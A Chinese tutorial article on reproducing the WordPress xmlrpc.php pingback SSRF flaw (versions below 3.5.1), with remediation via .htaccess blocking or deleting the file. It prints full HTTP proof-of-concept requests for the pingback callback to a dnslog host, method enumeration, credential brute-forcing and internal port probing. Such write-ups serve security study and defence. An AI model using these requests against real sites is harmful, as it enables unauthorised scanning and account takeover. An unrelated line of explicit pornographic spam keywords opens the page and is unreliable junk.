亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

復(fù)現(xiàn)WordPress?xmlrpc.php漏洞和SSRF的詳細(xì)步驟

 更新時(shí)間:2022年04月02日 15:45:15   作者:xiaochuhe.  
這篇文章主要介紹了復(fù)現(xiàn)WordPress?xmlrpc.php漏洞和SSRF的相關(guān)資料,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下

一、漏洞介紹

通過(guò)Pingback可以實(shí)現(xiàn)的服務(wù)器端請(qǐng)求偽造 (Server-side request forgery,SSRF)和遠(yuǎn)程端口掃描。

二、漏洞影響

WordPress 版本< 3.5.1

造成的影響
1、可以對(duì)業(yè)務(wù)內(nèi)網(wǎng)進(jìn)行探測(cè)。
2、攻擊運(yùn)行在內(nèi)網(wǎng)或本地的應(yīng)用程序(比如溢出攻擊)。
3、利用file協(xié)議讀取本地文件等

三、漏洞復(fù)現(xiàn)

第一步:直接訪問(wèn)這個(gè)文件,初步判斷

第二步:發(fā)現(xiàn)POC驗(yàn)證數(shù)據(jù)包 

POST /xmlrpc.php HTTP/1.1
Host: www.目標(biāo).com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目標(biāo).com/?p=1</string></value></param>
    </params>
    </methodCall>

發(fā)送數(shù)據(jù)包

驗(yàn)證成功 !

四、深入利用

(一)查看系統(tǒng)允許的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 (二)賬號(hào)爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

(三)通過(guò)Pingback可以實(shí)現(xiàn)的服務(wù)器端請(qǐng)求偽造 (Server-side request forgery,SSRF)和遠(yuǎn)程端口掃描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探測(cè)的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>要探測(cè)的URL</string>
</value></param></params>
</methodCall>

五、漏洞修復(fù)

(一)通過(guò)APACHE的.htaccess屏蔽xmlrpc.php文件的訪問(wèn)。配置代碼如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

(二)刪除根目錄下的xmlrpc.php。

到此這篇關(guān)于復(fù)現(xiàn)WordPress xmlrpc.php漏洞和SSRF的文章就介紹到這了,更多相關(guān)WordPress漏洞復(fù)現(xiàn)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評(píng)論